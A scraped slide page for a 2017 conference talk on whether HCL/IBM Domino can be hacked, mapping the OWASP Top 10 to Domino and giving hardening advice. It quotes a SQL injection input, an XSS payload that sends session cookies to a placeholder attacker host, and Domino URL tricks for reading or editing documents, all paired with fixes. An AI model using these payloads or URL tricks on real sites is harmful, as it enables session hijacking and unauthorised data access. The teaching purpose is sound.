Challenges In Modern Application
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 

More from Howard Greenberg

January OpenNTF Webinar - Backup your Domino Server - New Options in V12
January OpenNTF Webinar - Backup your Domino Server - New Options in V12January OpenNTF Webinar - Backup your Domino Server - New Options in V12
January OpenNTF Webinar - Backup your Domino Server - New Options in V12Howard Greenberg
 
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...Howard Greenberg
 
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)Howard Greenberg
 
August OpenNTF Webinar - Git and GitHub Explained
August OpenNTF Webinar - Git and GitHub ExplainedAugust OpenNTF Webinar - Git and GitHub Explained
August OpenNTF Webinar - Git and GitHub ExplainedHoward Greenberg
 
July OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for DominoJuly OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for DominoHoward Greenberg
 
June OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification ManagerJune OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification ManagerHoward Greenberg
 
OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021Howard Greenberg
 
February OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for NewbiesFebruary OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for NewbiesHoward Greenberg
 
January OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep DiveJanuary OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep DiveHoward Greenberg
 
December OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript ToolkitDecember OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript ToolkitHoward Greenberg
 
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1Howard Greenberg
 
OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020Howard Greenberg
 
August Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's WorkbenchAugust Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's WorkbenchHoward Greenberg
 
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!Howard Greenberg
 
OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020Howard Greenberg
 
Dev112 let's calendar that
Dev112   let's calendar thatDev112   let's calendar that
Dev112 let's calendar thatHoward Greenberg
 
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...Howard Greenberg
 
Connect 2016-Move Your XPages Applications to the Fast Lane
Connect 2016-Move Your XPages Applications to the Fast LaneConnect 2016-Move Your XPages Applications to the Fast Lane
Connect 2016-Move Your XPages Applications to the Fast LaneHoward Greenberg
 

More from Howard Greenberg (20)

January OpenNTF Webinar - Backup your Domino Server - New Options in V12
January OpenNTF Webinar - Backup your Domino Server - New Options in V12January OpenNTF Webinar - Backup your Domino Server - New Options in V12
January OpenNTF Webinar - Backup your Domino Server - New Options in V12
 
BRPA November Meeting
BRPA November MeetingBRPA November Meeting
BRPA November Meeting
 
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
October OpenNTF Webinar - What we like about Domino/Notes 12, recommended new...
 
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
September-2021 OpenNTF Webinar: Domino Online Meeting Integration (DOMI)
 
August OpenNTF Webinar - Git and GitHub Explained
August OpenNTF Webinar - Git and GitHub ExplainedAugust OpenNTF Webinar - Git and GitHub Explained
August OpenNTF Webinar - Git and GitHub Explained
 
July OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for DominoJuly OpenNTF Webinar - HCL Presents Keep, a new API for Domino
July OpenNTF Webinar - HCL Presents Keep, a new API for Domino
 
June OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification ManagerJune OpenNTF Webinar - Domino V12 Certification Manager
June OpenNTF Webinar - Domino V12 Certification Manager
 
OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021OpenNTF Webinar, March, 2021
OpenNTF Webinar, March, 2021
 
February OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for NewbiesFebruary OpenNTF Webinar: Introduction to Ansible for Newbies
February OpenNTF Webinar: Introduction to Ansible for Newbies
 
January OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep DiveJanuary OpenNTF Webinar: 4D - Domino Docker Deep Dive
January OpenNTF Webinar: 4D - Domino Docker Deep Dive
 
December OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript ToolkitDecember OpenNTF Webinar: The Volt MX LotusScript Toolkit
December OpenNTF Webinar: The Volt MX LotusScript Toolkit
 
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
OpNovember Water Cooler Talk: The Mystery of Domino on Docker - Part 1
 
OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020OpenNTF Webinar, October 2020
OpenNTF Webinar, October 2020
 
August Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's WorkbenchAugust Webinar - Water Cooler Talks: A Look into a Developer's Workbench
August Webinar - Water Cooler Talks: A Look into a Developer's Workbench
 
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
July 2020 OpenNTF Webinar - Hear the Latest from the User Groups!
 
Open ntf 2020-jun
Open ntf 2020-junOpen ntf 2020-jun
Open ntf 2020-jun
 
OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020OpenNTF Webinar, May 19, 2020
OpenNTF Webinar, May 19, 2020
 
Dev112 let's calendar that
Dev112   let's calendar thatDev112   let's calendar that
Dev112 let's calendar that
 
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...MWLUG Session-  AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
MWLUG Session- AD112 - Take a Trip Into the Forest - A Java Primer on Maps, ...
 
Connect 2016-Move Your XPages Applications to the Fast Lane
Connect 2016-Move Your XPages Applications to the Fast LaneConnect 2016-Move Your XPages Applications to the Fast Lane
Connect 2016-Move Your XPages Applications to the Fast Lane
 

Recently uploaded

Enterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze IncEnterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze Incrobinwilliams8624
 
AI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human BeautyAI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human BeautyRaymond Okyere-Forson
 
JS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AIJS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AIIvo Andreev
 
Growing Oxen: channel operators and retries
Growing Oxen: channel operators and retriesGrowing Oxen: channel operators and retries
Growing Oxen: channel operators and retriesSoftwareMill
 
Why Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdfWhy Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdfBrain Inventory
 
Streamlining Your Application Builds with Cloud Native Buildpacks
Streamlining Your Application Builds  with Cloud Native BuildpacksStreamlining Your Application Builds  with Cloud Native Buildpacks
Streamlining Your Application Builds with Cloud Native BuildpacksVish Abrams
 
ERP For Electrical and Electronics manufecturing.pptx
ERP For Electrical and Electronics manufecturing.pptxERP For Electrical and Electronics manufecturing.pptx
ERP For Electrical and Electronics manufecturing.pptxAutus Cyber Tech
 
eAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspectionseAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspectionsNirav Modi
 
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/MLBig Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/MLAlluxio, Inc.
 
Fields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptxFields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptxJoão Esperancinha
 
Generative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-CouncilGenerative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-CouncilVICTOR MAESTRE RAMIREZ
 
Cybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadCybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadIvo Andreev
 
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...OnePlan Solutions
 
OpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS CalculatorOpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS CalculatorShane Coughlan
 
Webinar_050417_LeClair12345666777889.ppt
Webinar_050417_LeClair12345666777889.pptWebinar_050417_LeClair12345666777889.ppt
Webinar_050417_LeClair12345666777889.pptkinjal48
 
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdfARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdfTobias Schneck
 
Leveraging DxSherpa's Generative AI Services to Unlock Human-Machine Harmony
Leveraging DxSherpa's Generative AI Services to Unlock Human-Machine HarmonyLeveraging DxSherpa's Generative AI Services to Unlock Human-Machine Harmony
Leveraging DxSherpa's Generative AI Services to Unlock Human-Machine Harmonyelliciumsolutionspun
 
Introduction-to-Software-Development-Outsourcing.pptx
Introduction-to-Software-Development-Outsourcing.pptxIntroduction-to-Software-Development-Outsourcing.pptx
Introduction-to-Software-Development-Outsourcing.pptxIntelliSource Technologies
 
Sales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales CoverageSales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales CoverageDista
 

Recently uploaded (20)

Enterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze IncEnterprise Document Management System - Qualityze Inc
Enterprise Document Management System - Qualityze Inc
 
AI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human BeautyAI Embracing Every Shade of Human Beauty
AI Embracing Every Shade of Human Beauty
 
JS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AIJS-Experts - Cybersecurity for Generative AI
JS-Experts - Cybersecurity for Generative AI
 
Growing Oxen: channel operators and retries
Growing Oxen: channel operators and retriesGrowing Oxen: channel operators and retries
Growing Oxen: channel operators and retries
 
Why Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdfWhy Choose Brain Inventory For Ecommerce Development.pdf
Why Choose Brain Inventory For Ecommerce Development.pdf
 
Streamlining Your Application Builds with Cloud Native Buildpacks
Streamlining Your Application Builds  with Cloud Native BuildpacksStreamlining Your Application Builds  with Cloud Native Buildpacks
Streamlining Your Application Builds with Cloud Native Buildpacks
 
ERP For Electrical and Electronics manufecturing.pptx
ERP For Electrical and Electronics manufecturing.pptxERP For Electrical and Electronics manufecturing.pptx
ERP For Electrical and Electronics manufecturing.pptx
 
eAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspectionseAuditor Audits & Inspections - conduct field inspections
eAuditor Audits & Inspections - conduct field inspections
 
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/MLBig Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
Big Data Bellevue Meetup | Enhancing Python Data Loading in the Cloud for AI/ML
 
Salesforce AI Associate Certification.pptx
Salesforce AI Associate Certification.pptxSalesforce AI Associate Certification.pptx
Salesforce AI Associate Certification.pptx
 
Fields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptxFields in Java and Kotlin and what to expect.pptx
Fields in Java and Kotlin and what to expect.pptx
 
Generative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-CouncilGenerative AI for Cybersecurity - EC-Council
Generative AI for Cybersecurity - EC-Council
 
Cybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and BadCybersecurity Challenges with Generative AI - for Good and Bad
Cybersecurity Challenges with Generative AI - for Good and Bad
 
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
Transforming PMO Success with AI - Discover OnePlan Strategic Portfolio Work ...
 
OpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS CalculatorOpenChain Webinar: Universal CVSS Calculator
OpenChain Webinar: Universal CVSS Calculator
 
Webinar_050417_LeClair12345666777889.ppt
Webinar_050417_LeClair12345666777889.pptWebinar_050417_LeClair12345666777889.ppt
Webinar_050417_LeClair12345666777889.ppt
 
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdfARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
ARM Talk @ Rejekts - Will ARM be the new Mainstream in our Data Centers_.pdf
 
Leveraging DxSherpa's Generative AI Services to Unlock Human-Machine Harmony
Leveraging DxSherpa's Generative AI Services to Unlock Human-Machine HarmonyLeveraging DxSherpa's Generative AI Services to Unlock Human-Machine Harmony
Leveraging DxSherpa's Generative AI Services to Unlock Human-Machine Harmony
 
Introduction-to-Software-Development-Outsourcing.pptx
Introduction-to-Software-Development-Outsourcing.pptxIntroduction-to-Software-Development-Outsourcing.pptx
Introduction-to-Software-Development-Outsourcing.pptx
 
Sales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales CoverageSales Territory Management: A Definitive Guide to Expand Sales Coverage
Sales Territory Management: A Definitive Guide to Expand Sales Coverage
 

Bp101-Can Domino Be Hacked

  • 1. MWLUG 2017 Moving Collaboration Forward Can Domino Be Hacked? Lessons We Can Learn From the Security Community Howard Greenberg Andrew Pollack
  • 2. MWLUG 2017 Moving Collaboration Forward Our Amazing Sponsors
  • 3. MWLUG 2017 Moving Collaboration Forward Andrew Pollack Northern Collaborative Technologies • Administrator & Developer since version 2.0 • IBM Lotus Beacon Award Winner • Services – Security Review & Penetration Testing – Site Performance & Security Reviews – Expert Witness & Security Forensics – Application Development – Administrative Overhaul • Products – NCT Search – NCT Compliance Search – NCT Simple Sign On – NCT SAML for Domino 7+ • Structural Firefighter
  • 4. MWLUG 2017 Moving Collaboration Forward Howard Greenberg • Been doing Notes/Domino since 1993 – Developer, Admin, Consultant, Instructor • Co-founded TLCC in 1998 – Self-paced courses for Notes/Domino and XPages • Security Certifications – Certified Information Systems Auditor (CISA) – Certified Information Security Manager (CISM) • Certified Flight Instructor (CFI)
  • 5. MWLUG 2017 Moving Collaboration Forward Session Goals • Review the OWASP Top 10 Web Application Security Issues • Relate those to our Domino environments HG
  • 6. MWLUG 2017 Moving Collaboration Forward Why do I care? • I have a firewall, no one can touch my Domino environment! HG
  • 7. MWLUG 2017 Moving Collaboration Forward Reality Vendors Suppliers Customers Employees HG
  • 8. MWLUG 2017 Moving Collaboration Forward Major Breaches • Target – 70MM customer accounts – Stole logins from the HVAC subcontractor • Via phishing email, then malware got installed – Once in, pivoted to registers, installed malware • Captured credit card information, then uploaded to hackers – Lesson learned, segment networks, encrypt sensitive data Did the Firewall help? https://www.sans.org/reading- room/whitepapers/casestudies/case-study-critical-controls- prevented-target-breach-35412 HG
  • 9. MWLUG 2017 Moving Collaboration Forward OPM Breach • Office of Personnel Management (US) – Personal data on EVERY Federal employee • Plus more... • Phishing attack – got login data from a contractor – put malware on admin server • Lack of encryption on sensitive databases https://www.wired.com/2016/10/inside-cyberattack-shocked- us-government/ HG
  • 10. MWLUG 2017 Moving Collaboration Forward Who/What is OWASP • “Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software” • Publishes a list of the 10 Most Critical Web Application Security Risks – Widely Respected – For each Risk it provides: • A description • Example vulnerabilities • Example attacks • Guidance on how to avoid • References to OWASP and other related resource https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project HG
  • 11. MWLUG 2017 Moving Collaboration Forward Top 10 for 2017 (Release Candidate) • A1-Injection • A2-Broken Authentication and Session Management • A3-Cross-Site Scripting (XSS) • A4-Broken Access Control • A5-Security Misconfiguration • A6-Sensitive Data Exposure • A7-Insufficient Attack Protection • A8-Cross-Site Request Forgery (CSRF) • A9-Using Components with Known Vulnerabilities • A10-Underprotected APIs HG https://www.owasp.org/index.php/Top_10_2017-Top_10
  • 12. MWLUG 2017 Moving Collaboration Forward Sample of Information Published Link to PDF HG
  • 13. MWLUG 2017 Moving Collaboration Forward A1 - Injection The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates untrusted data from the command or query.. Typically SQL injection, got any sql code in your apps (accessing relational data)? like: String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'"; the attacker modifies the ‘id’ parameter value in her browser to send: ' or '1'='1. For example: http://example.com/app/accountView?id=‘ or '1'='1 This changes the meaning of both queries to return all the records from the accounts table. More dangerous attacks could modify data or even invoke stored procedures HG
  • 14. MWLUG 2017 Moving Collaboration Forward Domino Vulnerabilities – A1 • Got SQL code? – Use SQL parameters “SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'" "SELECT * FROM accounts WHERE custID= ?” – Scrub input – use prepared statements HG
  • 15. MWLUG 2017 Moving Collaboration Forward Domino Vulnerabilities – A1 • Hack Domino urls – Switch from openDocument to editDocument http://www.tlcc.com/mwlug/mwlug2017.nsf/topicThread.xsp?documentId=557D7B9 B86441DFF85258154004A827A&action=openDocument • Pivot to read all documents – open default view http://www.tlcc.com/mwlug/mwlug2017.nsf/$defaultview • Use zero as the view and open any document by id http://www.tlcc.com/mwlug/mwlug2017.nsf/0/ 557d7b9b86441dff85258154004a827a?EditDocument Fix - use proper reader/author names Block view access with $$ViewTemplateDefault HG
  • 16. MWLUG 2017 Moving Collaboration Forward A2-Broken Authentication and Session Management - What is it? • User authentication credentials aren’t properly protected when stored using hashing or encryption. • Credentials can be guessed or overwritten through weak account management functions • Session IDs are exposed in the URL • Session IDs are vulnerable to session fixation attacks. • Session IDs don’t timeout, or user sessions or authentication tokens aren’t properly invalidated during logout. • Session IDs aren’t rotated after successful login. • Passwords, session IDs, and other credentials are sent over unencrypted connections. AP
  • 17. MWLUG 2017 Moving Collaboration Forward A2-Protecting Stored Credentials • Domino is fairly good at this if you let it – Use Minimum Password Requirements – Protect your Domino Directory – Don’t store a password file “just in case” – Use the “Fewer Name Variants” option • Beware of SSO Solutions – Including SAML – You may be turning over all authentication controls to some other system! AP
  • 18. MWLUG 2017 Moving Collaboration Forward A2 – Weak Management Practices • Beware of password recovery processes – How do you verify the person requesting the password reset is really the person who should have it? This can also be used to deny service. – Any web site that can send you your old password when you request it should not be trusted AP
  • 19. MWLUG 2017 Moving Collaboration Forward A2 – Session IDs in the URL • While Domino doesn’t generally do this, some administrators do this to avoid creating Domino users, or to give specific user content within applications based on URLs – E.G. Urls that contain specific invoice numbers or trouble ticket ids to send users to specific documents AP
  • 20. MWLUG 2017 Moving Collaboration Forward A2 – Session “Fixation” Attacks • Can your stored authentication token be captured an re-used in Domino? – Spoiler Alert: Yes, it can – and quite easily • In Session based authentication the session token is stored in a cookie. • Anyone who can create web pages on your server can capture this using a bit of javascript. – Other servers – including non-Domino servers within your domain may be able to capture this cookie as well AP
  • 21. MWLUG 2017 Moving Collaboration Forward A2 – Preventing Domino “Fixation” attacks on your Domino Servers • Code review applications • Follow XSS prevention best practices • Change the default cookie domain path in your session ltpa token documents AP
  • 22. MWLUG 2017 Moving Collaboration Forward A2 – Passwords, session IDs, on unencrypted connections • There should no longer be any reason to allow unencrypted http connections at all. Sorry. It’s 2017. Stop doing this. AP
  • 23. MWLUG 2017 Moving Collaboration Forward A3 - Cross Site Scripting (XSS) You are vulnerable to Server XSS if your server-side code uses user-supplied input as part of the HTML output, and you don’t use context-sensitive escaping to ensure it cannot run. If a web page uses JavaScript to dynamically add attacker-controllable data to a page, you may have Client XSS. Ideally, you would avoid sending attacker-controllable data to unsafe JavaScript APIs, but escaping (and to a lesser extent) input validation can be used to make this safe. Example Attack Scenario The application uses untrusted data in the construction of the following HTML snippet without validation or escaping: (String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>"; The attacker modifies the ‘CC’ parameter in his browser to: '><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi? foo='+document.cookie</script>'. This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. HG
  • 24. MWLUG 2017 Moving Collaboration Forward Domino Vulnerability – A3 • YES, any web application is!!! • Any text input, especially rich text (converts to link) • Prevention – Always sanitize any input • Domino web – look for html tags, strip out – Have to roll your own with LotusScript – Note: CSJS is not an option! • XPages have HTML Filters HG
  • 25. MWLUG 2017 Moving Collaboration Forward XPages HTML Filters • XPages has built-in filtering • Have to turn on – HTMLFilter – for output – HTMLFilterIn – filters on saving • Use acf as the option! – Identity does nothing, empty kills everything – Turn on for all rich text (server, app, or XPage) xsp.richtext.default.htmlfilter=acf HG More Information!
  • 26. MWLUG 2017 Moving Collaboration Forward A4-Broken Access Control • Not just ACL Settings – but includes them – Maximum Internet Name & Password Access – Anonymous & Default “No Access” on all database you don’t expect web users to access – Obscurity is not Security – (See App Dev Practices) AP
  • 27. MWLUG 2017 Moving Collaboration Forward A5-Security Misconfiguration • Don’t expose your operating system to the internet. • Turn off all services you don’t need • Keep your Domino version fully up to date – Tools like “Metasploit” know all about Domino – Out of date servers can be hacked to a remote command line in 30 seconds with menu driven hacking tools AP
  • 28. MWLUG 2017 Moving Collaboration Forward A5 – Use Good HTTP Password Management practices • Assign HTTP Passwords even if you don’t use them. This field will get filled in with garbage if you do not. – These are also used to attack your SMTP mail handler AP
  • 29. MWLUG 2017 Moving Collaboration Forward A5 – Don’t Help the Hackers • By default your server tells the world what software you’re running. It’s like you WANT to get hacked AP
  • 30. MWLUG 2017 Moving Collaboration Forward A5 – Don’t Help the Hackers! • HTTPDisableServerHeader=1 • Then Get Fancy! Add your own SERVER header AP
  • 31. MWLUG 2017 Moving Collaboration Forward A5 - Set up SSL the right way • Use TLS • Use the right SSL settings • Use a score check service to validate AP www.ssllabs.com/ssltest/index.html
  • 32. MWLUG 2017 Moving Collaboration Forward A5 – Domino Web Server Settings May need to modify ciphers available Disable_SSLV3=1 SSL_USE_CLIENT_CIPHER_ORDER=1
  • 33. MWLUG 2017 Moving Collaboration Forward A6- Sensitive Data Exposure Am I vulnerable to Data Exposure? The first thing you have to determine is which data is sensitive enough to require extra protection. For example, passwords, credit card numbers, health records, and personal information should be protected. For all such data: 1. Is any of this data stored in clear text long term, including backups of this data? 2. Is any of this data transmitted in clear text, internally or externally? Internet traffic is especially dangerous. 3. Are any old / weak cryptographic algorithms used? 4. Are weak crypto keys generated, or is proper key management or rotation missing? 5. Are any browser security directives or headers missing when sensitive data is provided by / sent to the browser? HG
  • 34. MWLUG 2017 Moving Collaboration Forward Domino Vulnerability – A6 Know your data, what is sensitive - RISK ANALYSIS! • HTTPS should be turned on/forced for anything that may be sensitive - protect data in motion • Store data in encrypted fields protect data when sitting – Notes encryption (field level), now in XPages in FP8! • Use TLS 1.2 only, older encryption is vulnerable – Turn off SSLV3 • Passwords in names.nsf – setting to hash in better encrypted ways • PCI - If your company takes credit cards, you are subject to PCI • PII - personal information, many rules for EU, states, etc. HG
  • 35. MWLUG 2017 Moving Collaboration Forward A7 - Insufficient Attack Protection Am I Vulnerable to Attack? Detecting, responding to, and blocking attacks makes applications dramatically harder to exploit yet almost no applications or APIs have such protection. Critical vulnerabilities in both custom code and components are also discovered all the time, yet organizations frequently take weeks or even months to roll out new defenses. It should be very obvious if attack detection and response isn’t in place. Simply try manual attacks or run a scanner against the application. The application or API should identify the attacks, block any viable attacks, and provide details on the attacker and characteristics of the attack. If you can’t quickly roll out virtual and/or actual patches when a critical vulnerability is discovered, you are left exposed to attack.AP
  • 36. MWLUG 2017 Moving Collaboration Forward A7-Insufficient Attack Protection • Is anyone monitoring your HTTP and SMTP logs to look for attacks? • Does your company have an IDS (Intrusion Detection System)? • Fail2Ban – Poor Linux Admin’s IDS AP
  • 37. MWLUG 2017 Moving Collaboration Forward A8 - Cross-Site Request Forgery (CSRF) Am I Vulnerable to CSRF? To check whether an application is vulnerable, see if any links and forms lack an unpredictable CSRF token. Without such a token, attackers can forge malicious requests. An alternate defense is to require the user to prove they intended to submit the request, such as through reauthentication. Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets. Multistep transactions are not inherently immune. Also be aware that Server- Side Request Forgery (SSRF) is also possible by tricking apps and APIs into generating arbitrary HTTP requests. Note that session cookies, source IP addresses, and other information automatically sent by the browser don’t defend against CSRF since they are included in the forged requests. HG
  • 38. MWLUG 2017 Moving Collaboration Forward Domino Vulnerabilities – A8 • Prevent your content from being rendered in an iframe or frameset that you did not generate. • Domino web admin is vulnerable, turn off! • Domino frameset – DominoValidateFramesetSRC=1 - make sure the content in the frameset comes from the same database https://www- 10.lotus.com/ldd/dominowiki.nsf/dx/DominoValidateFramesetSRC • Set header - (note required for PCI compliance) http://www-01.ibm.com/support/docview.wss?uid=swg21568598 HG
  • 39. MWLUG 2017 Moving Collaboration Forward A8 – X-Frame-Options Header • Use the header “X-Frame-Options” to tell browsers not to allow your page to be loaded in someone else’s frame – Frequently required by customer security audits AP
  • 40. MWLUG 2017 Moving Collaboration Forward A9 - Using Components with Known Vulnerabilities • The challenge is to continuously monitor the components (both client-side and server-side) you are using for new vulnerability reports. This monitoring can be very difficult because vulnerability reports are not standardized, making them hard to find and search for the details you need (e.g., the exact component in a product family that has the vulnerability). Worst of all, many vulnerabilities never get reported to central clearinghouses like CVE and NVD. • Determining if you are vulnerable requires searching these databases, as well as keeping abreast of project mailing lists and announcements for anything that might be a vulnerability. This process can be done manually, or with automated tools. If a vulnerability in a component is discovered, carefully evaluate whether you are actually vulnerable. Check to see if your code uses the vulnerable part of the component and whether the flaw could result in an impact you care about. Both checks can be difficult to perform as vulnerability reports can be deliberately vague. HG
  • 41. MWLUG 2017 Moving Collaboration Forward Domino Vulnerabilities – A9 • What software is your application using? Does that have vulnerabilities? – JS libraries like jQuery, Select2 – Java libraries (pdf, JSON, credit card...) • What software is IBM using? (Example Java libraries, Apache struts, etc.) – Example: Apache Struts vulnerability – Be sure to keep the Domino JVM updated – Interim fixes – Latest Fix PackHG
